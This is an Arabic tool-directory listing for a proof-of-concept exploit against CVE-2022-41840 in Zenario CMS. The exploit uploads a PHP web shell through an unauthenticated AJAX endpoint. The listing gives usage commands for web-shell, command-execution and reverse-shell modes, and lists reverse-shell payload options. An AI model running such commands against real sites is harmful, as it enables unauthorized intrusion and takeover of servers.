Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-41840-PoC — هذا هو استغلال PoC لـ CVE-2022-41840، لتشغيل Zenario | Kitploit
أدوات/GitHubGitHub/princeaikinsbaidoo/cve-2022-41840-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubprinceaikinsbaidoo/cve-2022-41840-poc

CVE-2022-41840-PoC

هذا هو استغلال PoC لـ CVE-2022-41840، لتشغيل Zenario

عرض المستودع
3منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Zenario CMS 9.3 - استغلال تنفيذ تعليمات برمجية عن بُعد بدون مصادقة

CVE-2022-41840

ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) بدون مصادقة تؤثر على Zenario CMS الإصدار 9.3 والإصدارات الأقدم. يستغل الاستغلال ثغرة رفع ملفات في نقطة نهاية AJAX لرفع قشرة ويب PHP وتحقيق تنفيذ التعليمات البرمجية.

تفاصيل الثغرة

  • CVE: CVE-2022-41840
  • الإصدار المتأثر: Zenario CMS <= 9.3
  • نوع الثغرة: رفع ملفات بدون مصادقة يؤدي إلى RCE
  • ناقل الهجوم: HTTP POST إلى /zenario/ajax.php
  • الصلاحيات المطلوبة: لا شيء (بدون مصادقة)

الاستخدام

قشرة ويب تفاعلية

python3 zenario_exploit.py --target http://target.com

تنفيذ أمر واحد

python3 zenario_exploit.py --target http://target.com --cmd "id"

شل عكسي

python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444

المتطلبات

  • Python 3.x
  • مكتبة requests

تثبيت التبعيات:

pip install requests

الميزات

  • رفع تلقائي لقشرة ويب PHP عبر نقطة نهاية AJAX المعرضة للخطر
  • دعم قيم متعددة لـ instanceId لزيادة نسبة النجاح
  • استخراج المسار بناءً على JSON والتعبيرات النمطية
  • خيارات متعددة لحمولات الشل العكسي (bash, python, perl, nc)
  • واجهة PTY تفاعلية كاملة مع دعم الطرفية
  • الرجوع إلى قشرة الويب في حالة فشل الشل العكسي

إخلاء المسؤولية

لأغراض تعليمية واختبارات أمنية مرخصة فقط.

هذه الأداة مُقدمة لباحثي الأمن ومختبري الاختراق لاختبار أنظمة يمتلكونها أو لديهم إذن صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني وممنوع منعًا باتًا.

لا يتحمل المسؤولون أي مسؤولية عن أي استخدام خاطئ أو ضرر ناتج عن هذه الأداة.

الترخيص

هذا الكود مُقدم للأغراض التعليمية.

تنزيل الأداة